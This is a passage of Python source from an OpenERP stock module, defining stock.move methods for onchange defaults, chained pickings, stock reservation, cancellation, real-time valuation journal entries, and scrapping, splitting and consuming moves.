            partner_rec = self.pool.get('res.partner').browse(cr, uid, partner_id)
            if partner_rec:
                lang = partner_rec.lang or False
        ctx = {'lang': lang}

        product = self.pool.get('product.product').browse(cr, uid, [prod_id], context=ctx)[0]
        uos_id = product.uos_id and product.uos_id.id or False
        # Derive the UoS quantity for the default quantity of 1.00.
        qty_change = self.pool.get('stock.move').onchange_quantity(
            cr, uid, ids, prod_id, 1.00, product.uom_id.id, uos_id)
        result = {
            'product_uom': product.uom_id.id,
            'product_uos': uos_id,
            'product_qty': 1.00,
            'product_uos_qty': qty_change['value']['product_uos_qty'],
            'prodlot_id': False,
        }
        if not ids:
            result['name'] = product.partner_ref
        if loc_id:
            result['location_id'] = loc_id
        if loc_dest_id:
            result['location_dest_id'] = loc_dest_id
        return {'value': result}

    def onchange_move_type(self, cr, uid, ids, type, context=None):
        """Propose default source/destination locations for the move type.

        @param type: Move Type ('in', 'out' or anything else for internal)
        @return: onchange dict setting location_id / location_dest_id
        """
        mod_obj = self.pool.get('ir.model.data')
        location_obj = self.pool.get('stock.location')
        # XML ids (module 'stock') of the default locations per move type.
        src_xml_id = 'stock_location_stock'
        dest_xml_id = 'stock_location_stock'
        if type == 'in':
            src_xml_id = 'stock_location_suppliers'
        elif type == 'out':
            dest_xml_id = 'stock_location_customers'

        def _resolve(xml_id):
            # Return the (model, id) reference, or False when the record is
            # missing or the user lacks read access to it.
            try:
                ref = mod_obj.get_object_reference(cr, uid, 'stock', xml_id)
                with tools.mute_logger('openerp.osv.orm'):
                    location_obj.check_access_rule(cr, uid, [ref[1]], 'read', context=context)
                return ref
            except (orm.except_orm, ValueError):
                return False

        source_location = _resolve(src_xml_id)
        dest_location = _resolve(dest_xml_id)
        return {'value': {'location_id': source_location and source_location[1] or False,
                          'location_dest_id': dest_location and dest_location[1] or False}}

    def onchange_date(self, cr, uid, ids, date, date_expected, context=None):
        """Keep the move date in sync with the scheduled date.

        @param date: current move date (unused; kept for the onchange signature)
        @param date_expected: scheduled date; when empty, "now" is used instead
        @return: onchange dict setting 'date' to the scheduled date
        """
        return {'value': {'date': date_expected or time.strftime('%Y-%m-%d %H:%M:%S')}}

    def _chain_compute(self, cr, uid, moves, context=None):
        """Group moves by the chained-location rule applying to their destination.

        For each move, stock.location.chained_location_get() is consulted.
        A 'transparent' chain rewrites the move in place (new date and
        destination) and recurses, since the new destination may itself be
        chained; any other chain type is collected for later processing by
        create_chained_picking().

        @param moves: stock.move browse records
        @return: dict mapping a picking (browse record, or False) to a list
                 of (move, chain_spec) tuples, where — as used below —
                 chain_spec[0] is the chained destination location,
                 chain_spec[1] the chain type, chain_spec[2] a delay in days,
                 chain_spec[3] a stock journal id and chain_spec[5] a picking
                 type.
        """
        result = {}
        for m in moves:
            dest = self.pool.get('stock.location').chained_location_get(
                cr,
                uid,
                m.location_dest_id,
                m.picking_id and m.picking_id.partner_id and m.picking_id.partner_id,
                m.product_id,
                context
            )
            if dest:
                if dest[1] == 'transparent':
                    # Transparent chaining: push this very move on to the
                    # chained location, delayed by dest[2] days, instead of
                    # creating a separate chained move.
                    newdate = (datetime.strptime(m.date, '%Y-%m-%d %H:%M:%S') + relativedelta(days=dest[2] or 0)).strftime('%Y-%m-%d')
                    self.write(cr, uid, [m.id], {
                        'date': newdate,
                        'location_dest_id': dest[0].id})
                    if m.picking_id and (dest[3] or dest[5]):
                        self.pool.get('stock.picking').write(cr, uid, [m.picking_id.id], {
                            'stock_journal_id': dest[3] or m.picking_id.stock_journal_id.id,
                            'type': dest[5] or m.picking_id.type
                        }, context=context)
                    # Keep the in-memory record consistent, then recurse on
                    # the updated move and merge the nested results.
                    m.location_dest_id = dest[0]
                    res2 = self._chain_compute(cr, uid, [m], context=context)
                    for pick_id in res2.keys():
                        result.setdefault(pick_id, [])
                        result[pick_id] += res2[pick_id]
                else:
                    result.setdefault(m.picking_id, [])
                    result[m.picking_id].append( (m, dest) )
        return result

    def _prepare_chained_picking(self, cr, uid, picking_name, picking, picking_type, moves_todo, context=None):
        """Build the values dict used to create a new chained picking.

           :param str picking_name: desired new picking name
           :param browse_record picking: source picking (being chained to)
           :param str picking_type: desired new picking type
           :param list moves_todo: list of (move, chain_spec) pairs, where
               chain_spec is (dest_location, auto_packing, chained_delay,
               chained_journal, chained_company_id, chained_picking_type) —
               see stock_location.chained_location_get().
        """
        company_obj = self.pool.get('res.company')
        # The chain spec of the first move drives the picking-level settings.
        chain_spec = moves_todo[0][1]
        return {
            'name': picking_name,
            'origin': tools.ustr(picking.origin or ''),
            'type': picking_type,
            'note': picking.note,
            'move_type': picking.move_type,
            'auto_picking': chain_spec[1] == 'auto',
            'stock_journal_id': chain_spec[3],
            'company_id': chain_spec[4] or company_obj._company_default_get(cr, uid, 'stock.company', context=context),
            'partner_id': picking.partner_id.id,
            'invoice_state': 'none',
            'date': picking.date,
        }

    def _create_chained_picking(self, cr, uid, picking_name, picking, picking_type, moves_todo, context=None):
        """Create the chained picking and return its id.

        Parameters are those of _prepare_chained_picking().
        """
        picking_obj = self.pool.get('stock.picking')
        values = self._prepare_chained_picking(cr, uid, picking_name, picking, picking_type, moves_todo, context=context)
        # FIX: propagate the context to create() (it was previously dropped),
        # so defaults and translations apply consistently with the prepare step.
        return picking_obj.create(cr, uid, values, context=context)

    def create_chained_picking(self, cr, uid, moves, context=None):
        """Create the chained moves (and pickings) implied by *moves*.

        For every (picking, chained specs) pair returned by _chain_compute(),
        a new picking is created (when the source moves belong to one) and
        each source move is copied into it, going from the old destination to
        the chained location. Recurses because a chained move may itself be
        chained further.

        @param moves: stock.move browse records
        @return: list of browse records of all newly created moves
        """
        res_obj = self.pool.get('res.company')
        location_obj = self.pool.get('stock.location')
        move_obj = self.pool.get('stock.move')
        wf_service = netsvc.LocalService("workflow")
        new_moves = []
        if context is None:
            context = {}
        seq_obj = self.pool.get('ir.sequence')
        for picking, todo in self._chain_compute(cr, uid, moves, context=context).items():
            # Picking type: explicit in the chain spec, otherwise derived from
            # the (new source, new destination) location pair.
            ptype = todo[0][1][5] and todo[0][1][5] or location_obj.picking_type_get(cr, uid, todo[0][0].location_dest_id, todo[0][1][0])
            if picking:
                # name of new picking according to its type
                if ptype == 'internal':
                    new_pick_name = seq_obj.get(cr, uid,'stock.picking')
                else :
                    new_pick_name = seq_obj.get(cr, uid, 'stock.picking.' + ptype)
                pickid = self._create_chained_picking(cr, uid, new_pick_name, picking, ptype, todo, context=context)
                # Need to check name of old picking because it always considers picking as "OUT" when created from Sales Order
                old_ptype = location_obj.picking_type_get(cr, uid, picking.move_lines[0].location_id, picking.move_lines[0].location_dest_id)
                if old_ptype != picking.type:
                    old_pick_name = seq_obj.get(cr, uid, 'stock.picking.' + old_ptype)
                    self.pool.get('stock.picking').write(cr, uid, [picking.id], {'name': old_pick_name, 'type': old_ptype}, context=context)
            else:
                pickid = False
            # Copy each source move into the chained picking; the copy stays
            # 'waiting' and is linked back via move_dest_id/move_history_ids.
            for move, (loc, dummy, delay, dummy, company_id, ptype, invoice_state) in todo:
                new_id = move_obj.copy(cr, uid, move.id, {
                    'location_id': move.location_dest_id.id,
                    'location_dest_id': loc.id,
                    'date': time.strftime('%Y-%m-%d'),
                    'picking_id': pickid,
                    'state': 'waiting',
                    'company_id': company_id or res_obj._company_default_get(cr, uid, 'stock.company', context=context)  ,
                    'move_history_ids': [],
                    'date_expected': (datetime.strptime(move.date, '%Y-%m-%d %H:%M:%S') + relativedelta(days=delay or 0)).strftime('%Y-%m-%d'),
                    'move_history_ids2': []}
                )
                move_obj.write(cr, uid, [move.id], {
                    'move_dest_id': new_id,
                    'move_history_ids': [(4, new_id)]
                })
                new_moves.append(self.browse(cr, uid, [new_id])[0])
            if pickid:
                wf_service.trg_validate(uid, 'stock.picking', pickid, 'button_confirm', cr)
        if new_moves:
            # Chains can span several hops: recurse on the moves just created.
            new_moves += self.create_chained_picking(cr, uid, new_moves, context)
        return new_moves

    def action_confirm(self, cr, uid, ids, context=None):
        """Confirm the stock moves and generate any chained pickings.

        @return: empty list (kept for API compatibility)
        """
        # Browse first so the records are available to the chaining logic
        # after the state change below.
        move_records = self.browse(cr, uid, ids, context=context)
        self.write(cr, uid, ids, {'state': 'confirmed'})
        self.create_chained_picking(cr, uid, move_records, context)
        return []

    def action_assign(self, cr, uid, ids, *args):
        """Try to reserve stock for the confirmed/waiting moves among *ids*.

        @return: result of check_assign() (number of moves processed)
        """
        pending_ids = [move.id for move in self.browse(cr, uid, ids)
                       if move.state in ('confirmed', 'waiting')]
        return self.check_assign(cr, uid, pending_ids)

    def force_assign(self, cr, uid, ids, context=None):
        """Mark the moves as assigned regardless of actual availability.

        @return: True
        """
        self.write(cr, uid, ids, {'state': 'assigned'})
        # Nudge the related picking workflows so their state follows the moves.
        workflow = netsvc.LocalService('workflow')
        for move in self.browse(cr, uid, ids, context):
            picking = move.picking_id
            if picking:
                workflow.trg_write(uid, 'stock.picking', picking.id, cr)
        return True

    def cancel_assign(self, cr, uid, ids, context=None):
        """Release the reservation: put the moves back to 'confirmed'.

        @return: True
        """
        self.write(cr, uid, ids, {'state': 'confirmed'})

        # fix for bug lp:707031: changing move availability does not trigger
        # the picking workflow by itself, so trg_write is called explicitly
        # on each related picking to let its state follow.
        workflow = netsvc.LocalService('workflow')
        for move in self.browse(cr, uid, ids, context):
            picking = move.picking_id
            if picking:
                workflow.trg_write(uid, 'stock.picking', picking.id, cr)
        return True

    #
    # Duplicate stock.move
    #
    def check_assign(self, cr, uid, ids, context=None):
        """Try to reserve stock for the given moves.

        Consumables and supplier-sourced moves are treated as available as-is;
        stockable products go through stock.location._product_reserve(). When
        a reservation spans several source locations, the move is split (via
        copy) into one move per reserved chunk.

        @return: number of moves processed (length of the 'done' list)
        """
        done = []
        count = 0
        pickings = {}
        if context is None:
            context = {}
        for move in self.browse(cr, uid, ids, context=context):
            # Consumables and goods pulled from a supplier location need no
            # reservation: mark them done-able straight away.
            if move.product_id.type == 'consu' or move.location_id.usage == 'supplier':
                if move.state in ('confirmed', 'waiting'):
                    done.append(move.id)
                pickings[move.picking_id.id] = 1
                continue
            if move.state in ('confirmed', 'waiting'):
                # Important: we must pass lock=True to _product_reserve() to avoid race conditions and double reservations
                res = self.pool.get('stock.location')._product_reserve(cr, uid, [move.location_id.id], move.product_id.id, move.product_qty, {'uom': move.product_uom.id}, lock=True)
                if res:
                    #_product_available_test depends on the next status for correct functioning
                    #the test does not work correctly if the same product occurs multiple times
                    #in the same order. This is e.g. the case when using the button 'split in two' of
                    #the stock outgoing form
                    self.write(cr, uid, [move.id], {'state':'assigned'})
                    done.append(move.id)
                    pickings[move.picking_id.id] = 1
                    # The first reserved chunk updates this move in place
                    # (direct SQL, bypassing the ORM).
                    r = res.pop(0)
                    product_uos_qty = self.pool.get('stock.move').onchange_quantity(cr, uid, ids, move.product_id.id, r[0], move.product_id.uom_id.id, move.product_id.uos_id.id)['value']['product_uos_qty']
                    cr.execute('update stock_move set location_id=%s, product_qty=%s, product_uos_qty=%s where id=%s', (r[1], r[0],product_uos_qty, move.id))

                    # Each remaining chunk becomes a copy of the move with
                    # its own quantity and source location.
                    while res:
                        r = res.pop(0)
                        product_uos_qty = self.pool.get('stock.move').onchange_quantity(cr, uid, ids, move.product_id.id, r[0], move.product_id.uom_id.id, move.product_id.uos_id.id)['value']['product_uos_qty']
                        move_id = self.copy(cr, uid, move.id, {'product_uos_qty': product_uos_qty, 'product_qty': r[0], 'location_id': r[1]})
                        done.append(move_id)
        if done:
            count += len(done)
            self.write(cr, uid, done, {'state': 'assigned'})

        if count:
            # Nudge the affected picking workflows so they can progress.
            for pick_id in pickings:
                wf_service = netsvc.LocalService("workflow")
                wf_service.trg_write(uid, 'stock.picking', pick_id, cr)
        return count

    def setlast_tracking(self, cr, uid, ids, context=None):
        """Assign the latest pack (highest tracking id) already used on the
        picking to the moves; create a fresh pack when none exists yet.

        @return: True
        """
        picking = self.browse(cr, uid, ids, context=context)[0].picking_id
        if picking:
            track_ids = [line.tracking_id.id for line in picking.move_lines if line.tracking_id]
            if track_ids:
                tracking_id = max(track_ids)
            else:
                tracking_id = self.pool.get('stock.tracking').create(cr, uid, {}, context=context)
            self.write(cr, uid, ids, {'tracking_id': tracking_id})
        return True

    #
    # Cancel move => cancel others move and pickings
    #
    def action_cancel(self, cr, uid, ids, context=None):
        """Cancel the moves; when all moves of a picking end up cancelled,
        the picking itself is cancelled too.

        @return: True
        """
        if not len(ids):
            return True
        if context is None:
            context = {}
        pickings = set()
        for move in self.browse(cr, uid, ids, context=context):
            if move.state in ('confirmed', 'waiting', 'assigned', 'draft'):
                if move.picking_id:
                    pickings.add(move.picking_id.id)
            # A downstream move waiting on this one falls back to 'confirmed',
            # since its supply will no longer arrive through the chain.
            if move.move_dest_id and move.move_dest_id.state == 'waiting':
                self.write(cr, uid, [move.move_dest_id.id], {'state': 'confirmed'}, context=context)
                if context.get('call_unlink',False) and move.move_dest_id.picking_id:
                    wf_service = netsvc.LocalService("workflow")
                    wf_service.trg_write(uid, 'stock.picking', move.move_dest_id.picking_id.id, cr)
        self.write(cr, uid, ids, {'state': 'cancel', 'move_dest_id': False}, context=context)
        if not context.get('call_unlink',False):
            # Cancel each affected picking once every one of its moves is cancelled.
            for pick in self.pool.get('stock.picking').browse(cr, uid, list(pickings), context=context):
                if all(move.state == 'cancel' for move in pick.move_lines):
                    self.pool.get('stock.picking').write(cr, uid, [pick.id], {'state': 'cancel'}, context=context)

        # Re-evaluate each move's workflow after the state change.
        wf_service = netsvc.LocalService("workflow")
        for id in ids:
            wf_service.trg_trigger(uid, 'stock.move', id, cr)
        return True

    def _get_accounting_data_for_valuation(self, cr, uid, move, context=None):
        """
        Return the accounts and journal to use to post Journal Entries for the real-time
        valuation of the move.

        :param context: context dictionary that can explicitly mention the company to consider via the 'force_company' key
        :return: (journal_id, acc_src, acc_dest, acc_valuation) tuple of ids
        :raise: osv.except_osv() if any mandatory account or journal is not defined.
        """
        product_obj=self.pool.get('product.product')
        accounts = product_obj.get_product_accounts(cr, uid, move.product_id.id, context)
        # Source side: the source location's outgoing-valuation account, when
        # set, overrides the product/category stock input account.
        if move.location_id.valuation_out_account_id:
            acc_src = move.location_id.valuation_out_account_id.id
        else:
            acc_src = accounts['stock_account_input']

        # Destination side: the destination location's incoming-valuation
        # account, when set, overrides the product/category stock output account.
        if move.location_dest_id.valuation_in_account_id:
            acc_dest = move.location_dest_id.valuation_in_account_id.id
        else:
            acc_dest = accounts['stock_account_output']

        acc_valuation = accounts.get('property_stock_valuation_account_id', False)
        journal_id = accounts['stock_journal']

        # Posting both legs of an entry to the same account would produce a
        # meaningless self-balancing entry: reject that configuration up front.
        if acc_dest == acc_valuation:
            raise osv.except_osv(_('Error!'),  _('Cannot create Journal Entry, Output Account of this product and Valuation account on category of this product are same.'))

        if acc_src == acc_valuation:
            raise osv.except_osv(_('Error!'),  _('Cannot create Journal Entry, Input Account of this product and Valuation account on category of this product are same.'))

        if not acc_src:
            raise osv.except_osv(_('Error!'),  _('Please define stock input account for this product or its category: "%s" (id: %d)') % \
                                    (move.product_id.name, move.product_id.id,))
        if not acc_dest:
            raise osv.except_osv(_('Error!'),  _('Please define stock output account for this product or its category: "%s" (id: %d)') % \
                                    (move.product_id.name, move.product_id.id,))
        if not journal_id:
            raise osv.except_osv(_('Error!'), _('Please define journal on the product category: "%s" (id: %d)') % \
                                    (move.product_id.categ_id.name, move.product_id.categ_id.id,))
        if not acc_valuation:
            raise osv.except_osv(_('Error!'), _('Please define inventory valuation account on the product category: "%s" (id: %d)') % \
                                    (move.product_id.categ_id.name, move.product_id.categ_id.id,))
        return journal_id, acc_src, acc_dest, acc_valuation

    def _get_reference_accounting_values_for_valuation(self, cr, uid, move, context=None):
        """Return (reference_amount, reference_currency_id) representing the
        inventory valuation of *move*.

        These reference values should possibly be converted before being
        posted in Journals, to adapt to the primary and secondary currencies
        of the relevant accounts.
        """
        if context is None:
            context = {}
        # Quantity converted into the product's default UoM.
        default_uom = move.product_id.uom_id.id
        qty = self.pool.get('product.uom')._compute_qty(cr, uid, move.product_uom.id, move.product_qty, default_uom)

        if move.product_id.cost_method == 'average' and move.price_unit:
            # Average-cost product with an explicit unit price entered in the
            # picking wizard: honour that price (and its currency, if any).
            reference_currency_id = move.price_currency_id.id or move.company_id.currency_id.id
            return qty * move.price_unit, reference_currency_id

        # Otherwise fall back to the standard valuation price, which is
        # expressed in the default currency of the move's company.
        company_currency_id = move.company_id.currency_id.id
        currency_ctx = dict(context, currency_id=company_currency_id)
        amount_unit = move.product_id.price_get('standard_price', context=currency_ctx)[move.product_id.id]
        return amount_unit * qty, company_currency_id


    def _create_product_valuation_moves(self, cr, uid, move, context=None):
        """
        Generate the appropriate accounting moves if the product being moved is subject
        to real_time valuation tracking, and the source or destination location is
        a transit location or is outside of the company.
        """
        if move.product_id.valuation == 'real_time': # FIXME: product valuation should perhaps be a property?
            if context is None:
                context = {}
            # Per-side contexts forcing the company of each location, so the
            # accounts/journal are resolved in the right company.
            src_company_ctx = dict(context,force_company=move.location_id.company_id.id)
            dest_company_ctx = dict(context,force_company=move.location_dest_id.company_id.id)
            account_moves = []
            # Outgoing moves (or cross-company output part)
            if move.location_id.company_id \
                and (move.location_id.usage == 'internal' and move.location_dest_id.usage != 'internal'\
                     or move.location_id.company_id != move.location_dest_id.company_id):
                journal_id, acc_src, acc_dest, acc_valuation = self._get_accounting_data_for_valuation(cr, uid, move, src_company_ctx)
                reference_amount, reference_currency_id = self._get_reference_accounting_values_for_valuation(cr, uid, move, src_company_ctx)
                #returning goods to supplier
                if move.location_dest_id.usage == 'supplier':
                    account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_valuation, acc_src, reference_amount, reference_currency_id, context))]
                else:
                    account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_valuation, acc_dest, reference_amount, reference_currency_id, context))]

            # Incoming moves (or cross-company input part)
            if move.location_dest_id.company_id \
                and (move.location_id.usage != 'internal' and move.location_dest_id.usage == 'internal'\
                     or move.location_id.company_id != move.location_dest_id.company_id):
                journal_id, acc_src, acc_dest, acc_valuation = self._get_accounting_data_for_valuation(cr, uid, move, dest_company_ctx)
                # NOTE(review): the reference values below use src_company_ctx
                # while the accounts above use dest_company_ctx — this looks
                # asymmetric; confirm it is intended for cross-company moves.
                reference_amount, reference_currency_id = self._get_reference_accounting_values_for_valuation(cr, uid, move, src_company_ctx)
                #goods return from customer
                if move.location_id.usage == 'customer':
                    account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_dest, acc_valuation, reference_amount, reference_currency_id, context))]
                else:
                    account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_src, acc_valuation, reference_amount, reference_currency_id, context))]

            # Post one account.move per collected (journal, lines) pair.
            move_obj = self.pool.get('account.move')
            for j_id, move_lines in account_moves:
                move_obj.create(cr, uid,
                        {
                         'journal_id': j_id,
                         'line_id': move_lines,
                         'ref': move.picking_id and move.picking_id.name}, context=context)

    def action_done(self, cr, uid, ids, context=None):
        """Process the moves (state 'done'); related pickings and chained
        (downstream) moves are triggered/updated along the way.

        @return: True
        """
        picking_ids = []
        move_ids = []
        wf_service = netsvc.LocalService("workflow")
        if context is None:
            context = {}

        # Draft moves are confirmed first (which also runs the chaining logic).
        todo = []
        for move in self.browse(cr, uid, ids, context=context):
            if move.state=="draft":
                todo.append(move.id)
        if todo:
            self.action_confirm(cr, uid, todo, context=context)
            todo = []

        for move in self.browse(cr, uid, ids, context=context):
            if move.state in ['done','cancel']:
                continue
            move_ids.append(move.id)

            if move.picking_id:
                picking_ids.append(move.picking_id.id)
            if move.move_dest_id.id and (move.state != 'done'):
                # Downstream move should only be triggered if this move is the last pending upstream move
                other_upstream_move_ids = self.search(cr, uid, [('id','!=',move.id),('state','not in',['done','cancel']),
                                            ('move_dest_id','=',move.move_dest_id.id)], context=context)
                if not other_upstream_move_ids:
                    self.write(cr, uid, [move.id], {'move_history_ids': [(4, move.move_dest_id.id)]})
                    if move.move_dest_id.state in ('waiting', 'confirmed'):
                        # Make the chained move available; when flagged
                        # auto_validate, process it immediately as well.
                        self.force_assign(cr, uid, [move.move_dest_id.id], context=context)
                        if move.move_dest_id.picking_id:
                            wf_service.trg_write(uid, 'stock.picking', move.move_dest_id.picking_id.id, cr)
                        if move.move_dest_id.auto_validate:
                            self.action_done(cr, uid, [move.move_dest_id.id], context=context)

            # Post the real-time valuation entries before flipping the state.
            self._create_product_valuation_moves(cr, uid, move, context=context)
            if move.state not in ('confirmed','done','assigned'):
                todo.append(move.id)

        if todo:
            self.action_confirm(cr, uid, todo, context=context)

        self.write(cr, uid, move_ids, {'state': 'done', 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)}, context=context)
        for id in move_ids:
             wf_service.trg_trigger(uid, 'stock.move', id, cr)

        # Let the pickings re-evaluate their own state.
        for pick_id in picking_ids:
            wf_service.trg_write(uid, 'stock.picking', pick_id, cr)

        return True

    def _create_account_move_line(self, cr, uid, move, src_account_id, dest_account_id, reference_amount, reference_currency_id, context=None):
        """
        Generate the account.move.line values to post to track the stock valuation difference due to the
        processing of the given stock move.

        @param move: browse record of the stock.move being valued
        @param src_account_id: id of the account.account to credit
        @param dest_account_id: id of the account.account to debit
        @param reference_amount: amount to post, expressed in reference_currency_id
        @param reference_currency_id: id of the res.currency in which reference_amount is expressed
        @return: list of two (0, 0, vals) one2many commands: the debit line and the credit line
        """
        # prepare default values considering that the destination accounts have the reference_currency_id as their main currency
        partner_id = (move.picking_id.partner_id and self.pool.get('res.partner')._find_accounting_partner(move.picking_id.partner_id).id) or False
        debit_line_vals = {
                    'name': move.name,
                    'product_id': move.product_id and move.product_id.id or False,
                    'quantity': move.product_qty,
                    'ref': move.picking_id and move.picking_id.name or False,
                    'date': time.strftime('%Y-%m-%d'),
                    'partner_id': partner_id,
                    'debit': reference_amount,
                    'account_id': dest_account_id,
        }
        credit_line_vals = {
                    'name': move.name,
                    'product_id': move.product_id and move.product_id.id or False,
                    'quantity': move.product_qty,
                    'ref': move.picking_id and move.picking_id.name or False,
                    'date': time.strftime('%Y-%m-%d'),
                    'partner_id': partner_id,
                    'credit': reference_amount,
                    'account_id': src_account_id,
        }

        # if we are posting to accounts in a different currency, provide correct values in both currencies correctly
        # when compatible with the optional secondary currency on the account.
        # Financial Accounts only accept amounts in secondary currencies if there's no secondary currency on the account
        # or if it's the same as that of the secondary amount being posted.
        account_obj = self.pool.get('account.account')
        src_acct, dest_acct = account_obj.browse(cr, uid, [src_account_id, dest_account_id], context=context)
        src_main_currency_id = src_acct.company_id.currency_id.id
        dest_main_currency_id = dest_acct.company_id.currency_id.id
        cur_obj = self.pool.get('res.currency')
        if reference_currency_id != src_main_currency_id:
            # fix credit line: convert the amount into the company currency of the credited account
            credit_line_vals['credit'] = cur_obj.compute(cr, uid, reference_currency_id, src_main_currency_id, reference_amount, context=context)
            if (not src_acct.currency_id) or src_acct.currency_id.id == reference_currency_id:
                # keep the original amount as secondary-currency info (negative: credit side)
                credit_line_vals.update(currency_id=reference_currency_id, amount_currency=-reference_amount)
        if reference_currency_id != dest_main_currency_id:
            # fix debit line: convert the amount into the company currency of the debited account
            debit_line_vals['debit'] = cur_obj.compute(cr, uid, reference_currency_id, dest_main_currency_id, reference_amount, context=context)
            if (not dest_acct.currency_id) or dest_acct.currency_id.id == reference_currency_id:
                debit_line_vals.update(currency_id=reference_currency_id, amount_currency=reference_amount)

        return [(0, 0, debit_line_vals), (0, 0, credit_line_vals)]

    def unlink(self, cr, uid, ids, context=None):
        """Delete stock moves.

        Only draft moves may be deleted, unless the caller explicitly sets
        'call_unlink' in the context to force the deletion.
        """
        if context is None:
            context = {}
        ctx = dict(context)
        force = ctx.get('call_unlink', False)
        for move in self.browse(cr, uid, ids, context=context):
            if not force and move.state != 'draft':
                raise osv.except_osv(_('User Error!'), _('You can only delete draft moves.'))
        return super(stock_move, self).unlink(cr, uid, ids, context=ctx)

    # _create_lot function is not used anywhere
    def _create_lot(self, cr, uid, ids, product_id, prefix=False):
        """ Create a production lot for the given product.
        @param product_id: id of the product the lot is created for
        @param prefix: optional prefix for the lot name
        @return: id of the new stock.production.lot
        """
        return self.pool.get('stock.production.lot').create(
            cr, uid, {'prefix': prefix, 'product_id': product_id})

    def action_scrap(self, cr, uid, ids, quantity, location_id, context=None):
        """ Move the scrap/damaged product into scrap location
        @param cr: the database cursor
        @param uid: the user id
        @param ids: ids of stock move object to be scrapped
        @param quantity : scrap qty, expressed in the move's unit of measure
        @param location_id : id of the destination (scrap) location
        @param context: context arguments
        @return: ids of the newly created scrap moves
        @raise osv.except_osv: if quantity is not strictly positive, if a source
               location is not internal, or if a move has zero/negative quantity
        """
        if quantity <= 0:
            raise osv.except_osv(_('Warning!'), _('Please provide a positive quantity to scrap.'))
        res = []
        product_obj = self.pool.get('product.product')
        for move in self.browse(cr, uid, ids, context=context):
            source_location = move.location_id
            if move.state == 'done':
                # a done move already delivered the goods: scrap them from where they now are
                source_location = move.location_dest_id
            if source_location.usage != 'internal':
                #restrict to scrap from a virtual location because it's meaningless and it may introduce errors in stock ('creating' new products from nowhere)
                raise osv.except_osv(_('Error!'), _('Forbidden operation: it is not allowed to scrap products from a virtual location.'))
            move_qty = move.product_qty
            if move_qty <= 0:
                # guard against a ZeroDivisionError in the UoS ratio below
                # (same defensive check as action_consume())
                raise osv.except_osv(_('Error!'), _('Cannot scrap a move with negative or zero quantity.'))
            # keep the UoS quantity proportional to the scrapped UoM quantity
            uos_qty = quantity / move_qty * move.product_uos_qty
            default_val = {
                'location_id': source_location.id,
                'product_qty': quantity,
                'product_uos_qty': uos_qty,
                'state': move.state,
                'scrapped': True,
                'location_dest_id': location_id,
                'tracking_id': move.tracking_id.id,
                'prodlot_id': move.prodlot_id.id,
            }
            new_move = self.copy(cr, uid, move.id, default_val)
            res.append(new_move)
            for product in product_obj.browse(cr, uid, [move.product_id.id], context=context):
                if move.picking_id:
                    # notify the picking's followers about the scrapped quantity
                    uom = product.uom_id.name if product.uom_id else ''
                    message = _("%s %s %s has been <b>moved to</b> scrap.") % (quantity, uom, product.name)
                    move.picking_id.message_post(body=message)

        self.action_done(cr, uid, res, context=context)
        return res

    # action_split function is not used anywhere
    # FIXME: deprecate this method
    def action_split(self, cr, uid, ids, quantity, split_by_qty=1, prefix=False, with_lot=True, context=None):
        """ Split Stock Move lines into chunks, optionally assigning a production lot to each.
        @param cr: the database cursor
        @param uid: the user id
        @param ids: ids of stock move object to be split
        @param quantity : total quantity to split, expressed in the move's UoM
        @param split_by_qty : size of each split chunk
        @param prefix : prefix of the production lots to create
        @param with_lot : if True, a production lot is created and assigned to each split line
        @param context: context arguments
        @return: ids of the split move lines
        """

        if context is None:
            context = {}
        if quantity <= 0:
            raise osv.except_osv(_('Warning!'), _('Please provide proper quantity.'))

        res = []

        for move in self.browse(cr, uid, ids, context=context):
            if split_by_qty <= 0 or quantity == 0:
                return res

            # UoS quantities are kept proportional to the UoM quantities
            uos_qty = split_by_qty / move.product_qty * move.product_uos_qty

            quantity_rest = quantity % split_by_qty
            # BUGFIX: the remainder line is written with product_qty == quantity_rest,
            # so its UoS quantity must be derived from quantity_rest (was split_by_qty).
            uos_qty_rest = quantity_rest / move.product_qty * move.product_uos_qty

            update_val = {
                'product_qty': split_by_qty,
                'product_uos_qty': uos_qty,
            }
            for idx in range(int(quantity//split_by_qty)):
                if not idx and move.product_qty<=quantity:
                    # reuse the original move for the first chunk when it fits entirely
                    current_move = move.id
                else:
                    current_move = self.copy(cr, uid, move.id, {'state': move.state})
                res.append(current_move)
                if with_lot:
                    update_val['prodlot_id'] = self._create_lot(cr, uid, [current_move], move.product_id.id)

                self.write(cr, uid, [current_move], update_val)


            if quantity_rest > 0:
                idx = int(quantity//split_by_qty)
                update_val['product_qty'] = quantity_rest
                update_val['product_uos_qty'] = uos_qty_rest
                if not idx and move.product_qty<=quantity:
                    current_move = move.id
                else:
                    current_move = self.copy(cr, uid, move.id, {'state': move.state})

                res.append(current_move)


                if with_lot:
                    update_val['prodlot_id'] = self._create_lot(cr, uid, [current_move], move.product_id.id)

                self.write(cr, uid, [current_move], update_val)
        return res

    def action_consume(self, cr, uid, ids, quantity, location_id=False, context=None):
        """ Consume products with a specific quantity from a specific source location.
        @param cr: the database cursor
        @param uid: the user id
        @param ids: ids of stock move object to be consumed
        @param quantity : quantity to consume, expressed in the move's UoM
        @param location_id : optional source location; defaults to each move's own location
        @param context: context arguments
        @return: ids of the consumed move lines
        """
        # `quantity` is expressed in the move's UoM
        if context is None:
            context = {}
        if quantity <= 0:
            raise osv.except_osv(_('Warning!'), _('Please provide proper quantity.'))
        res = []
        for move in self.browse(cr, uid, ids, context=context):
            move_qty = move.product_qty
            if move_qty <= 0:
                # also prevents a ZeroDivisionError in the UoS ratios below
                raise osv.except_osv(_('Error!'), _('Cannot consume a move with negative or zero quantity.'))
            # quantity_rest = what remains on the original move after consumption
            quantity_rest = move.product_qty
            quantity_rest -= quantity
            uos_qty_rest = quantity_rest / move_qty * move.product_uos_qty
            if quantity_rest <= 0:
                # consuming the whole move (or more): nothing remains, cap at the move qty
                quantity_rest = 0
                uos_qty_rest = 0
                quantity = move.product_qty

            uos_qty = quantity / move_qty * move.product_uos_qty
            # remainder is non-zero w.r.t. the product's UoM rounding: split the move
            if float_compare(quantity_rest, 0, precision_rounding=move.product_id.uom_id.rounding):
                default_val = {
                    'product_qty': quantity,
                    'product_uos_qty': uos_qty,
                    'state': move.state,
                    'location_id': location_id or move.location_id.id,
                }
                # the copy becomes the consumed part; the original keeps the remainder
                current_move = self.copy(cr, uid, move.id, default_val)
                res += [current_move]
                update_val = {}
